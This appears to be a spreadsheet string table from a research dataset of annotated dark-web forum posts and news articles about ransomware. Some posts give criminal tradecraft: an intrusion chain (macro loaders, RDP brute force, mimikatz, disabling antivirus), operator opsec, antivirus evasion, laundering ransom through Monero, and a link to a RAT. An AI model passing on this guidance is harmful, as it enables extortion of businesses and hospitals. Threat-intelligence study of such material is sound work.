  </si>
  <si>
    <t>0 days 04:05:00</t>
  </si>
  <si>
    <t>if you have good forum presence and even some vouches some of the main gangs wont care whether you're russian. remember that they have public open spots for affiliates from time to time so as long as you can prove them you're not le and know what you're doing you have a chance at the spot.;;sorry about my curiosity, but if a user can breach and traverse corp networks with relative ease why would he message you instead of going directly to the gangs? their credentials are public.</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;earlier this month, eastern european hackers launched an attack on colonial pipeline, shutting down the largest pipeline system for refined-oil products. the company ultimately paid nearly $5 million in ransom to retrieve 100 gigabytes of data that was being held hostage.;;;source:;the garden island;;the incident added colonial pipeline to a growing list of businesses victimized by ransomware ��� a type of malicious software or malware that prevents access to your computer���s data. in 2020, the federal bureau of investigation���s internet crime complaint center received close to 2,500 ransomware complaints with losses of over $29.1 million.;;;how does ransomware work?;;there are several methods for malware to make its way into a business���s computer system. a few of the most common tactics include:;;phishing emails target a company by attaching malware to an incoming message. if the receiver opens or clicks the included link, malware enters the systhave access to the system���s information and can hold it hostage; the remote desktop protocol (rdp) links computers over a network connection. using trial-and-error to obtain user credentials, or simply purchasing those on the darknet, hackers gain unauthorized rdp access to exploit systems and download ransomware; software vulnerabilities allow cybercriminals to take advantage of security weaknesses in software programs and gain access to the company���s system.;;;could ransomware attack my small business?;;absolutely. according to the cyber readiness institute, more than half of all organizations have experienced an online security breach, and two-thirds of small and medium enterprises who encounter a cyberattack fail to recover. cybersecurity needs to be a priority for every company, regardless of size. starting with a cybersecurity plan is the first step.;;;here���s how to get started:;;assign a cyber readiness leader; train employees on basic security practices and how to spot phishingnique passwords or, even better, a passphrase, and require resetting the password frequently; use multifactor authentication, including security questions, a code sent to another device, a separate app, biometrics or gps location.;;also, make sure your software is updated, your firewall is enabled, and set antivirus software scans automatically; back up data to a separate location frequently; establish appropriate internet-use guidelines for your staff; create user accounts for each employee and give administrative privileges only to trusted vital personnel.;;with cybercrime expected to hit $6 trillion this year, securing your company���s data should be a high priority. for most small businesses, having a dedicated it employee isn���t feasible. outsourcing your it to a reputable, trustworthy company is a solution. start your search</t>
  </si>
  <si>
    <t>Article describing how ransomware attacks are on the rise</t>
  </si>
  <si>
    <t>b73b1fbc5f7204a054dd</t>
  </si>
  <si>
    <t>Ransomware Attacks Are Rising</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;a wave of hacks has created a cottage industry of negotiators who broker payouts. cybersecurity specialists communicate with hackers or transmit payments using cryptocurrencies amid a surge of ransomware attacks.;;kurtis minder got into the ransomware negotiation business by accident early last year.;;the startup he co-founded, groupsense inc., monitors dark web forums and chat groups to see when hackers sell access to businesses��� computer networks. after mr. minder���s firm told a software company that criminals appeared to have targeted it, the company asked groupsense to talk down the attackers from an initial demand of more than $1 million to unlock internal data they had encrypted with ransomware. the two sides settled on a roughly $200,000 payout, he said.;;groupsense soon began fielding more such requests from victims��� law firms and insurance companies, which reached up to 10 a week by the end of last year. the company charges flat rates of $12,0d on clients��� revenue. ���we did not jump in,��� mr. minder said of the market for ransom negotiation, adding that it is a loss leader for his firm���s other services. ���we got dragged in kicking and screaming, basically.���;;the growing prevalence and complexity of ransomware has spurred a cottage industry of first responders to counter it. startups have launched to communicate with hackers or transmit payments using cryptocurrencies, while large cyber companies have hired personnel or acquired specialty firms to help clients respond to and recover from such incidents.;;ransomware took on new prominence this month after a hacking group known as darkside targeted colonial pipeline co. and forced a six-day shutdown of the largest conduit for fuel on the east coast. colonial pipeline chief executive joseph blount told the wall street journal wednesday he decided to pay the hackers about $4.4 million in bitcoin hours after receiving a ransom note.;;a representative didn�0tiated the price down. ���we needed to do everything in our power to restart the system quickly and safely,��� he said in a statement.;;victims must quickly weigh such payments against potentially crippling computer outages or hackers��� extortion threats in the form of leaked internal data. in the worst cases, negotiators help victims cut a deal they never wanted to make.;;���i do approach it as a business deal,��� said karen sprenger, chief operating officer and lead ransomware negotiator for cyber firm lmg security. while victims often are understandably angry during such talks, ms. sprenger tries to remain detached. ���you can���t go into it showing emotion,��� she said.;;some cyber experts warn the new muscle is still hard-pressed to match increasingly professionalized hacking groups behind a ransomware boom that u.s. officials have labeled a national security threat. some security firms also are wary of the risks from engaging with criminals or facilitatin��the industry is, in certain areas, hitting capacity limits,��� said eric friedberg, co-president of stroz friedberg, an incident-response consulting firm owned by insurance company aon plc. while mr. friedberg said stroz friedberg advises executives on trade-offs, the firm works with specialty negotiators with a granular knowledge of ransomware groups��� tactics and trustworthiness, key factors for victims deciding how to respond.;;���is what���s important to the company the speed of resolution or lowering the ransomware payment?��� mr. friedberg said. ���those are often mutually exclusive goals, and they���re usually board level decisions.��� as executives debate their strategy, negotiators at firms such as booz allen hamilton inc. play a game of cat and mouse with hackers through emails or online chats, said jerry bessette, senior vice president of the consulting firm���s cyber incident response program. the goal is to glean insights into what data hackers may have stolen, stalling for time as victims probe the impact and try to restore their systems using backups.;;���time is money on both sides,��� said mr. bessette, who estimated that upward of 80% of his team���s investigations involve ransomware, up from about half a few years ago. making ransom payments doesn���t necessarily mean companies are able to unlock their data. the decryption tool hackers provided to colonial pipeline didn���t allow the company to fully restore its systems, the journal reported.;;such snafus are uncommon for credible hacking groups, said charles carmakal, chief technology officer of cybersecurity firm fireeye inc.���s consulting arm, mandiant. but he said his team is sometimes able to extract information from unworkable decryptors and design its own.;;fireeye advised colonial pipeline after the recent hack but mr. carmakal declined to comment on it. the publicly traded firm doesn���t negotiate directly with hackers or make payments, he said. arlington, va.-based groupsense does facilitaarty brokers to convert victims��� cash into cryptocurrency and transferring it to hackers.;;banks increasingly scrutinize transactions reaching seven figures, said mr. minder, the company���s chief executive. but many of his clients include small businesses, such as a print shop and florist, negotiating ransoms of tens of thousands of dollars.;;���it���s very different from when you get into the room with a large company���they���ve got a whole committee working on this thing,��� he said. with small companies, he added, ���you���ve got the guy who start</t>
  </si>
  <si>
    <t>Article discussing how more companies have had to negotiate or pay ransomware groups their ransom as ransomware attacks increases</t>
  </si>
  <si>
    <t>23/05/2021 19:53</t>
  </si>
  <si>
    <t>bfc2d2224c1229186c39</t>
  </si>
  <si>
    <t>Ransomware Boom Forces More Companies to Cut Deals With Criminals</t>
  </si>
  <si>
    <t>{'extortion': 1, 'darkside': 1, 'ransomware': 7}</t>
  </si>
  <si>
    <t>running ransomwear is kind of scummy. you're targeting vulnerable individuals like old grannies, small business owners, students and educational institutions. the crypto mining malware sounds like a much better idea, as it will generate you revenue just using some of their cpu (i wouldn't put it up to max otherwise their computer is going to slow down and they're going to notice). you're going to have to change the signature and metadata of the code so avs won't catch it, but they eventually will.</t>
  </si>
  <si>
    <t>User stating they do not agree with those who perform ransomware attacks</t>
  </si>
  <si>
    <t>18/10/2021 09:15</t>
  </si>
  <si>
    <t>6ad5c7b0332d5d8430c8</t>
  </si>
  <si>
    <t>Ransomware Campaign</t>
  </si>
  <si>
    <t>0 days 15:41:00</t>
  </si>
  <si>
    <t>binder to make it pass as pdf ?;;that will not work;that doesnt work many years agp;;second of all;99% of ransomware attacks in last 2 years are not done by mail spam;they are intended for post-exploitation execution;;;;best thing you can do, if you can spam at all, is to spam with some stager/loader, to buy docx macros exploit for 500-600, then on the bots which might have some acceses to corp networks ( rpweb, citrix, forti ) you load a stealer or bot;;then from this creds you connect to their corp vpn, you brute rdp acess, use mimikatz to gain exploit admin access, then you manually turn of all avs, and hit the ransomware manually.;;;propare opsec that most of the ransomware gangs use is usually somethng like this;;4g anon sim modem;any linux host with vpn;whonix;from whonix over remmina connecting to rdp with vms ( vds not vps );one vm with kali, and one with windows;and from the one with windows you connect to one another windows rdp where you put citrix or forti or whatever corp vpn client and from there you start accesing the network</t>
  </si>
  <si>
    <t>User proving general ransomware information</t>
  </si>
  <si>
    <t>18/10/2021 10:14</t>
  </si>
  <si>
    <t>if you really can spam, will provide you with docx macros exploit;and if you learn things i can even give you some of ransomwares to work for percentage;;i have conacts of blackmatter, conti, cl0p, egreggor, lockbit, some former revil guys</t>
  </si>
  <si>
    <t>User proving general ransomware information and offering information/contacts</t>
  </si>
  <si>
    <t>18/10/2021 10:16</t>
  </si>
  <si>
    <t>redeemer isn't fud at the moment. it was fud a few months after the release since it's a new ransomware family.;;you don't have to format anything if you're going to use tails, you just need a usb.;the setup i can recommend is using a windows vm, from which you will do all the hacking, blank of course and installed from 0, where you will route all traffic through the internal vm network containing whonix gateway and using it as the default gateway and dns server. this way all your traffic is routed through tor and you're protected by vm encapsulation.;;for the initial attack i recommend using some rat or backdoor, which will be executed by the target.;in order to use redeemer, you will have to disable av products on the target computer. if you don't want this, you can use a crypter, most of them will work.;as for the payload selection, it depends on system properties. if target has no useful files and it has a strong cpu/gpu you can use it to mine, however if it has databases or important personal files you should use the ransomware.;;i am the maker of redeemer, but i won't make you use it, of course. as some user mentioned there are (mostly russian made) alternatives, however i feel the need to tell you that their operations and infrastructure are insecure and might well represent a potential threat to every affiliate. if you want a safe download and execute ransomware, i would definitely recommend mine. i also do not keep any information of my affiliates and redeemer itself doesn't use internet at all, so no risk exists. also i do not care a single bit about which targets you attack - a lot of these alternatives ban attacking certain organizations or countries (however they use incredibly stupid methods to check this, so it can be bypassed easily, but the operators may still give you problems).</t>
  </si>
  <si>
    <t>Redeemer ransomware creator saying their ransoware isnt fud</t>
  </si>
  <si>
    <t>18/10/2021 16:45</t>
  </si>
  <si>
    <t>raas is done mainly through initial access brokers. they provide the initial access into a network and from there you do your thing! get you some iab's!</t>
  </si>
  <si>
    <t>User proving general raas information</t>
  </si>
  <si>
    <t>18/10/2021 23:37</t>
  </si>
  <si>
    <t>https://anonfile.com/l4r4v6cdn8/zeusrat_zip;;easy to use tool for ransomware attacks. you have a graphical user interface and basically with one click can execute a ransomware attack and follow it. the tool is actually rat but i am posting it mainly because i was interested in this ransomware capability</t>
  </si>
  <si>
    <t>/u/aol11</t>
  </si>
  <si>
    <t>5b53b3311eb554d0d5fc</t>
  </si>
  <si>
    <t>Ransomware Command and Control Tool</t>
  </si>
  <si>
    <t>how do ransomware creators/groups deploy their software into companies.</t>
  </si>
  <si>
    <t>User asks how to deploy ransomware.</t>
  </si>
  <si>
    <t>2c0be3e77cf1e51e2440</t>
  </si>
  <si>
    <t>Ransomware Deployment</t>
  </si>
  <si>
    <t>4 days 12:08:00</t>
  </si>
  <si>
    <t>inside threats.</t>
  </si>
  <si>
    <t>/u/eccxuu</t>
  </si>
  <si>
    <t>most often than not they use an insider person.</t>
  </si>
  <si>
    <t>/u/RegularCunt</t>
  </si>
  <si>
    <t>as in threatening them with information already leaked to download my ransomware?</t>
  </si>
  <si>
    <t>0 days 02:13:00</t>
  </si>
  <si>
    <t>inside job or hq fud exploits like jpeg, jpg, doc, xls, csv etc</t>
  </si>
  <si>
    <t>/u/Blueskies1337</t>
  </si>
  <si>
    <t>0 days 02:52:00</t>
  </si>
  <si>
    <t>nope and nope;;you have no idea what you are talking about.;doc and xls can be used for loader to gain initial access to corp network, but all of the modern ransomwares are post-exploitation malware. to be deployed after you already have data looted and gained access to the network;;rdp = ransomware deployment protocol</t>
  </si>
  <si>
    <t>for gaining initial access;;you know that for big scale ransomware attacks they spend couple of months withing the corp network before locking it ?</t>
  </si>
  <si>
    <t>how would i go through with laundering funds from ransomware, *$300k$*</t>
  </si>
  <si>
    <t>How to launder money from ransomware?</t>
  </si>
  <si>
    <t>6a0bcc6db38fee10bd8c</t>
  </si>
  <si>
    <t>Ransomware Funds Laundering</t>
  </si>
  <si>
    <t>2 days 03:18:00</t>
  </si>
  <si>
    <t>first step is convert to monero.</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;if a company takes too long to pay, the ransomware gang piles on the pressure by worrying their customers. ransomware gangs have a pretty easy time of it already. they hack into a company server, encrypt all their data, demand payment, and wait. but what if the victim drags their feet on paying the ransom? the gangs have a new tactic to add even more pressure to the situation in an attempt to force payment quickly.;;as krebsonsecurity reports, some of these gangs have realized they can email the customers and partners of the companies they are holding to ransom. one of these emails was sent to krebs by a customer of atlanta company racetrac petroleum, which recently suffered a "security incident" through one of its third-party service providers called accellion inc.;;the email reads, "good day! if you received this letter, you are a customer, buyer, partner or employee of [victim]. the company has been hacked, data has been stolen and will soon be released as the company refuses to protect its peoples' data ... we inform you that information about you will be published on the darknet [link to dark web victim shaming page] if the company does not contact us." the email concludes by suggesting the person "call or write to this store and ask to protect your privacy!!!!";;now imagine you are the company trying to decide whether to pay the ransom, and then your customers start calling in a panic demanding to know what's going on and asking for reassurance that their details are safe. it's sure to push a few victims into paying just to bring the whole episode to a close quickly and move on, which is exactly what the gangs want, too.;;krebs also points to ransomware gangs asking their victims to pay two different ransoms. the first payment unlocks the encrypted data, and the second payment guarantees the stolen data isn't published publicly or sold. but even if both ransom demands are paid, there really is no guarantee the stolen data won't be shared anyway. the only way to avoid this is to ensure protection is in place to prevent it happening in the first place.</t>
  </si>
  <si>
    <t>The article discusses a new tactic being used by ransomware gangs to pressure companies to pay ransom quickly</t>
  </si>
  <si>
    <t>6b4372b3f84901139f84</t>
  </si>
  <si>
    <t>Ransomware Gangs Are Emailing Customers to Put More Pressure on Companies to Pay</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;hi, it���s jamie on the cybersecurity team. there can be such a thing as too much attention. darkside and revil, two of the most prominent ransomware hacker groups out there, have taken to the shadows to escape the spotlight they���ve garnered in recent weeks, according to analysts who track the groups.;;source: bloomberg;;between the two of them, they have managed to extort tens of millions of dollars from corporations including colonial pipeline co. and jbs sa���and untold other victims who remain silent about the ransoms they���ve paid.;;that the fbi was able to recoup some of darkside���s winnings and seize some of its servers has cybercriminals rethinking their brazen approach, said daniel smith, head of research at cybersecurity firm radware ltd.;;���ransomware for the last few months was kind of like drug dealers who were openly standing on the corner, selling drugs. and what has happened is that there is a lot of heat and attentionhad to leave,��� he said.;;the groups have altered their tone on the dark web, he said, and when they talk about operations now, they cloak it in terms that suggest other activity, like penetration testing, which many firms carry out to legitimately test the fortitude of their systems.;;���there���s been a change on these dark net forums, in criminal forums, and they are pulling back into the shadows, not talking directly about targeting victims with ransomware,��� smith said.;;some of the russian hacker forums have banned discussions of ransomware and blocked groups like darkside from contributing to conversations, said jon dimaggio, chief security strategist at analyst1, who has long studied russian cybercriminal activity.;;���there is a fear that wasn���t there before,��� he said. ���these guys are legitimately concerned right now compared to the normal tone of things.���;;some of the conversations dimaggio shared include chatter about the possibility oht spend in jail before being eligible for parole and whether the russian government might turn on them because of political blowback.;;some of that blowback was evident when president vladimir putin met with president joe biden in geneva on june 16. biden asked putin to consider how bad a pipeline disruption���as happened in the u.s. after the colonial pipeline hack���would be on the russian economy. ���he said it would matter,��� biden told reporters.;;the two leaders agreed to assemble experts to work out what targets might be off limits. biden said he would be able to track the strength of putin���s commitment by seeing whether he acts against hackers operating within his country���s borders.;;with all the attention, ransomware groups may be keeping a low profile at present, but smith predicted it wouldn���t last. ���there���s way too much money on the table for them to walk away,��� he said. ���all these groups, all these operators and aff - jamie tarabay</t>
  </si>
  <si>
    <t>Two prominent ransomware groups (darkside and revil) have changed their tone on the dark web to escape the attention they've garnered in recent weeks.</t>
  </si>
  <si>
    <t>30/06/2021 18:10</t>
  </si>
  <si>
    <t>a7e79ef5b398a3c633e7</t>
  </si>
  <si>
    <t>Ransomware Groups Go Quiet on the Dark Web, at Least for Now</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;a number of hacking groups, including those employing ransomware, are teaming up to expand the threat landscape and take advantage of stolen data troves in cloud-based operations. hackers are teaming up with other cybercriminals to increase the impact of attacks and to take advantage of troves of stolen data. trend micro and intel 471 found ransomware groups are teaming up with lesser-known actors, while others are shifting operations to cloud-based services and technologies to increase the monetization of their hacking efforts.;;throughout the year���and in response to the global covid-19 crisis, hackers have steadily worked to take advantage of the new threat landscape provided by the rapid adoption of remote technologies and heightened fears amid the pandemic.;;microsoft previously warned that attacks have significantly increased in sophistication, as healthcare continues to be a prime target for many of these attack vectors given its vulnerable infrastructure and telihood of providers will opt to pay hacking demands. the latest report from intel 471 warned that given the success of ransomware attacks, its hacking groups are steadily developing new variants���and offering access to corporate networks on the dark web.;;the researchers tracked more than 25 different ransomware-as-a-service groups in the past year, including both well-known threat actors, lesser-known variants that spawned from failed strains, and completely new ransomware variants, among other private hacking groups and other threat actors.;;according to the report, dopplepaymer, egregor (formerly maze), netwalker, revil, and ryuk are the leading ransomware hacking groups.;;ryuk caused millions of ransomware attacks across the globe in 2020, with a prime focus on the healthcare sector���including the massive attack on universal health services. the variant was previously delivered via trickbot, but most recently it���s been paired with the bazar loader, as recently noted to healthitsecur at least 10 raas groups have emerged since december 2019, with another nine groups dubbed as ���rising��� powers tied to double extortion efforts. conti, in particular, has found the greatest amount of success this year, claiming 142 ransomware victims.;;notably, conti was behind several concerning extortion attempts on the healthcare sector this year, including nonprofit organizations that provide mental health and substance abuse services like riverside community care in massachusetts, family health centers of georgia, and adams memorial hospital.;;trend micro���s report highlighted another concerning shift in the threat landscape: hackers moving operations to the cloud. the emerging underground market is driven by efforts to sell access to troves of stolen information, which is commonly advertised on the dark web as ���clouds of logs.���;;the ���unprecedented increase��� of the cloud model was brought on by companies adopting digital transformation to improve the  but trend micro noted that just as legitimate businesses are reaping the benefits of a cloud service model, hackers are seeking the same success.;;���this underground market affects not just users whose credentials are stolen and sold to cybercriminal customers, but also the organizations that users are a part of, as these would have less time to detect and respond to attacks enabled by data provided by the clouds of logs,��� trend micro researchers explained.;;���some malicious actors host their clouds of logs in their private cloud-based platforms, which can be conveniently accessed by customers via tools for analyzing and extracting the data that they need to conduct malicious activities,��� they added. the timeline between the initial hack and leveraging the stolen data from the victim has drastically decreased, as well, from several weeks to sometimes within days or hours when the hacker employs the cloud-based method.;;thus, organizations have less time to detect and respond to e also leveraging this model in response to the volume of data offered on the dark web, which trend micro���s insights found to include several terabytes of data.;;what���s more, all organizations are at risk to this new threat model, regardless of whether they���ve adopted cloud-based services and technologies. as hackers are primarily selling and buying stolen data, including credentials that can be reused to gain access to a victim organization���s infrastructure.;;in fact, the emerging market for clouds of logs has spurred an increase in attempts to steal credentials to further victimize entities. the stolen information will often include authentication credentials, authenticated session attributes, keystrokes, documents scans, personally identifiable information, tax reports, and a host of other sensitive data.;;���with the exponential growth of cybercrime, some criminal gangs might be operating on massive amounts of valuable data,��� researchers explained. ���hoo exploit the full potential of such a colossal amount of data.���;;as a result, hackers are employing a ���pay-for-access��� scheme that allows other cybercriminals to monetize the data extracted from sellers��� clouds of logs, given that the stolen data is commonly exfiltrated from compromised end users and corporate systems.;;the cost of access to these datasets have varying price tags: limited access and downloads are offered for a few hundred dollars, while monthly subscription rates will cost a cybercriminal anywhere from $300 to $1,000.;;the trend micro and intel 471 reports should serve as a warning to all organizations, including those in healthcare: hackers are not only employing more sophisticated means in addition to traditional, less-complex attack methods, these criminals are also beginning to work together in a more coordinated fashion to ensure the biggest payout.;;given the federal joint alert on the presumed coordinated ransomware wave targeting the healthcare sector,review insights on human-operated campaigns to ensure all endpoints and vulnerabilities are secured. ���organizations should be able to design and implement countermeasures to avoid falling prey to criminal schemes that could compromise their data and systems,��� trend micro researchers wrote.;;���organizations [should] implement data-breach prevention and mitigation strategies as an integral part of their daily operations, particularly ones that could preclude criminals from compromising system accounts, which in turn could provide attackers with remote access (for example, through vpn and rdp) to organizational it premises,�</t>
  </si>
  <si>
    <t>hacking groups are shifting operations to cloud-based services and technologies to increas the monetization of their hacking efforts.</t>
  </si>
  <si>
    <t>18/11/2020 20:30</t>
  </si>
  <si>
    <t>1c2afd703deeafe975c0</t>
  </si>
  <si>
    <t>Ransomware Groups Team Up, as Hackers Shift into Cloud Operations</t>
  </si>
  <si>
    <t>{'extortion': 2, 'ransomware': 7, 'raas': 1}</t>
  </si>
  <si>
    <t>earlier, the administration of the xss site announced a ban on topics related to ransomware.;;the team of the largest cybercriminal forum exploit has decided to ban topics related to ransomware, so as not to attract too much attention. earlier this week, a similar decision and for the same reasons was made by the administration of the popular russian-language site xss.;;���we are glad to penetrate testers, specialists, coders. but they are not happy with lockers, they attract a lot of attention. the very type of activity is not pleasant to us in view of the fact that everything is located in a row, we do not consider it advisable to be present on our forum, partner programs of lockers. it was decided to remove all affiliate programs and prohibit them as a type of activity on our forum. all topics related to lockers will be removed, ���reads a statement on the exploit website.;;operators of the ransomware have already expressed dissatisfaction with the decision of the administration of the forums.  representatives of the extortionist group revil announced that they would "move" to a private platform within a week.;;in the same week it became known that the darkside group, responsible for the sensational attack on the american company colonial pipeline, which led to disruptions in the supply of fuel in part of the united states, lost access to part of the public infrastructure, including the blog, payment and cdn servers. the team also lost money stored on the payment server, which was transferred to an unknown address.;;according to a representative of the revil team (the darkside ransomware program is considered a variant of the revil ransomware), darkside has closed its raas service.;;also revil announced new restrictions for its partners. they include a ban on attacks by organizations from the social sector (health, education) and government structures in any country.</t>
  </si>
  <si>
    <t>Ban ransomware related topics in some hacker forums (exploit, xss). Revil ban on attacks to social sector.</t>
  </si>
  <si>
    <t>18/05/2021 23:35</t>
  </si>
  <si>
    <t>cd62211426bd07e22b79</t>
  </si>
  <si>
    <t>Ransomware Kicked Out Of Exploit Hacker Forum</t>
  </si>
  <si>
    <t>0 days 10:12:00</t>
  </si>
  <si>
    <t>{'darkside': 3, 'revil': 4, 'ransomware': 2, 'raas': 1}</t>
  </si>
  <si>
    <t>their mistake was simple.;do not touch americas oil, this country fights wars for oil, kills for oil and promotes dictators fo oil.;if you cut that line, you will be the most hunted individuum on this planet.;thts why they all turn their back to it, no hacker wants to be in the focus of such stuff.</t>
  </si>
  <si>
    <t>user debate why such forums ban ransomware related topics (they don't want to be target).</t>
  </si>
  <si>
    <t>19/05/2021 00:24</t>
  </si>
  <si>
    <t>0 days 00:49:00</t>
  </si>
  <si>
    <t>conti infected irish hospitals 4 days ago, ryuk went after us hospitals last year. they target specifically to get a higher chance of payment. not much of this is news apart from the pipeline guys getting hit and suddenly everyone freaks.;;surely exploit and xss had to know there was heat on them since wannacry, reports are always talking about "russian-speaking malefactors". i guess le doesn't care that much until it's some big us oil bu$ine$$.</t>
  </si>
  <si>
    <t>19/05/2021 00:41</t>
  </si>
  <si>
    <t>both of you are fucking retarded  and have zero clue how this works.  i actually used to work for up0 on the gandcrab project that turned into reevil. first of all the reevil team isnt spreading the malware , there job is to maintain the malware and the panels for the affiliate's.   the one thing uncle sam hates is the disruption of capital and having his infrastructure fucked with, people are most defiantly paying for this on the back end.;;they where a very attractive  crew to want to work for because they would give you 75 percent of the ransom after 1000 locks you would get 85 %.  if you have a private ek you can get 1000 locks in an hour depending on how you spread.  so one of there affiliate's got the pipe line company. not so much the reevil  team.;;the pipeline is a big news headline , but the bigger one is they got a bunch of police stations as well. all over the usa  and the police didnt meet the demand and they are dropping info on confidential informants and undercovers . which should trickle into here somewhat.;;its no surprise they are banning ransomware... us cyber command is probably pounding a lot of shit  that is fucking up there money that we dont know about . twisting the arm. malware community is super hot right now ... not safe to operate atm.</t>
  </si>
  <si>
    <t>user debate why such forums ban ransomware related topics (they don't want to be target). / how groups operate</t>
  </si>
  <si>
    <t>/u/koolandthegang</t>
  </si>
  <si>
    <t>19/05/2021 02:07</t>
  </si>
  <si>
    <t>cool mate, we're just still talking about different things while you insist "people missed the whole point".;;the whole point we were making is that le only has the power/money to act now because it's the pipeline (not even when it's police, hospitals, etc), regardless of whatever is "a lot bigger" for the ransomware guys.;;nobody was making any points about how groups operate.</t>
  </si>
  <si>
    <t>debate with other user</t>
  </si>
  <si>
    <t>19/05/2021 04:07</t>
  </si>
  <si>
    <t>how does one find the reevil onion? been trying to find these communities but not much discussion on dread</t>
  </si>
  <si>
    <t>where to find reevil in Tor?</t>
  </si>
  <si>
    <t>/u/eyeswiggle</t>
  </si>
  <si>
    <t>19/05/2021 09:47</t>
  </si>
  <si>
    <t>0 days 05:31:00</t>
  </si>
  <si>
    <t>how do these work? i've been really interested in this stuff lately. i only have intermediate knowledge in scripting languages like python and js, and c for low-level. i understand the basics of spreading them through emails individual/business to click a link/attachment from email and going from there.what can i do with my programming language, and what skills do you think is most important for successfully deploying ransomware.;;thanks</t>
  </si>
  <si>
    <t>question about how to spread/deploy ransomware</t>
  </si>
  <si>
    <t>/u/Mugiwara</t>
  </si>
  <si>
    <t>4acc6f263bbaad2d8983</t>
  </si>
  <si>
    <t>Ransomware Question from newb</t>
  </si>
  <si>
    <t>does anyone have a copy of the old funeithcodes readme for the ransomware written in c#. i have a copy of the source code still but do not have the steps to assemble it with the bitcoin address generator and everything. the readme used to bring you to a website which was a great step my step but the website was taken down</t>
  </si>
  <si>
    <t>User asking for documentation on a specific ransomeware</t>
  </si>
  <si>
    <t>28/03/2018 11:01</t>
  </si>
  <si>
    <t>f0a573f05c5856ae</t>
  </si>
  <si>
    <t>Ransomware README</t>
  </si>
  <si>
    <t>92 days 19:09:00</t>
  </si>
  <si>
    <t>id curious about this as well, just curious though, why c#? and aren't there more recent examples of ransomware out?</t>
  </si>
  <si>
    <t>/u/HumbleFox</t>
  </si>
  <si>
    <t>25/06/2018 09:17</t>
  </si>
  <si>
    <t>88 days 22:16:00</t>
  </si>
  <si>
    <t>why not check on github there are lots of ransomware on there, then just look at xss guides for instructions on how to make a simple logging tool to collect the keys.</t>
  </si>
  <si>
    <t>/u/renso</t>
  </si>
  <si>
    <t>29/06/2018 06:10</t>
  </si>
  <si>
    <t>3 days 20:53:00</t>
  </si>
  <si>
    <t>i have a lot of time on my hands at the moment and i want to use that time to learn everything about creating ransomware. i've been hard pressed to find any resources online that talk about the creation of ransomware. the closest i've gotten was learning winapi.;;are there any resources, tools, tips, advice, or anything to point me in the right direction? i don't want to make a half-assed malware i want to really take this serious and dedicate time to this</t>
  </si>
  <si>
    <t>15/05/2021 03:07</t>
  </si>
  <si>
    <t>7029f9cc1f7524bd9bbf</t>
  </si>
  <si>
    <t>Ransomware Resources</t>
  </si>
  <si>
    <t>5 days 21:29:00</t>
  </si>
  <si>
    <t>there are open source rw pocs on github that you can use as models to analyze. vulnerscom has a repo on petya / notpetya. tarcisio-marinho has one too, i think maybe modeled on wannnacry. graniet has one inspired by mr robot. others on github too.</t>
  </si>
  <si>
    <t>/u/k-4252-l</t>
  </si>
  <si>
    <t>15/05/2021 04:02</t>
  </si>
  <si>
    <t>i'd advise go on the forums on these leak sites you can learn from others what type of architecture implemented, tactics behind deployment among many other things;/post/fa503648825a131481a3</t>
  </si>
  <si>
    <t>/u/the_imposter</t>
  </si>
  <si>
    <t>15/05/2021 12:11</t>
  </si>
  <si>
    <t>not all ransomware, but this is a good repo of live malware to learn from:;[clearnet site];https://github.com/ytisf/thezoo</t>
  </si>
  <si>
    <t>17/05/2021 17:28</t>
  </si>
  <si>
    <t>2 days 00:26:00</t>
  </si>
  <si>
    <t>i have 20-30 victims that i think would be suitable for ransomware, i'm new to ransomware but not malware, and i'd like to get started with it and see if it's profitable. where do i start and with who now grandcrab is no-more ...</t>
  </si>
  <si>
    <t>User wishing to begin learning ransomware</t>
  </si>
  <si>
    <t>/u/mudwall</t>
  </si>
  <si>
    <t>7cc4539777033cd88d48</t>
  </si>
  <si>
    <t>Ransomware Service Provider (RaaS)</t>
  </si>
  <si>
    <t>26 days 11:46:00</t>
  </si>
  <si>
    <t>ransomeware is not even remotely the same thing as a bitcoin stealer. you keep fucking posting on;/d/hacking;, yet you know jack shit about any of this. not even that. on one of your previous posts, you tried to scam people on here.;;fuck off, you 13 year old fuck.</t>
  </si>
  <si>
    <t>User wishing to begin learning ransomware - poster critising the previous user due to lack of knowledge</t>
  </si>
  <si>
    <t>0 days 07:22:00</t>
  </si>
  <si>
    <t>lets have a talk if you need a private ransomware.</t>
  </si>
  <si>
    <t>/u/SunTzu</t>
  </si>
  <si>
    <t>what are you looking for? i have written a virustotal score 24/69 (non mainstream av) ransomware, but i need someone to distribute them for me. contact me if you need.;;it consists of frontend and backend, but i need someone to send them to victims;;the m461c14n ransomware is deactivated whenever it detects itself in a blackbox.;the keys are automatically sent to a backend server.;we are confident in our product, but we currently do not have any ways/channels of sending them out.;we are looking for anyone willing to help us with distributing them. (though we'll take a 40 percent cut)</t>
  </si>
  <si>
    <t>25 days 11:30:00</t>
  </si>
  <si>
    <t>anyone on here got any experience with deployment and / or the success of ransomwares available on any of the main dnms ?;;if so, which ones are good. ideally ones that come with guides showing the lesser able folks such as me how to deploy.</t>
  </si>
  <si>
    <t>User asking for information on how to deploy ransomware</t>
  </si>
  <si>
    <t>/u/hatemachine11</t>
  </si>
  <si>
    <t>23/08/2021 01:55</t>
  </si>
  <si>
    <t>d54d862112a03eaf551c</t>
  </si>
  <si>
    <t>Ransomware Tutorial</t>
  </si>
  <si>
    <t>1 days 16:53:00</t>
  </si>
  <si>
    <t>bought a ransomware in whm ( i dont remember the vendor) , it comes with spreading guide + huge email database as bonus;;search whitehouse market &gt;&gt; ransomware</t>
  </si>
  <si>
    <t>/u/thebeast888</t>
  </si>
  <si>
    <t>23/08/2021 04:10</t>
  </si>
  <si>
    <t>it depends what you want - if you're looking to learn then you can find loads on things like thezoo github.;;none of it will be able to actually deploy against a real target, and no actual ransomware that works comes with step by step guides or anything like that.</t>
  </si>
  <si>
    <t>24/08/2021 18:48</t>
  </si>
  <si>
    <t>1 days 07:59:00</t>
  </si>
  <si>
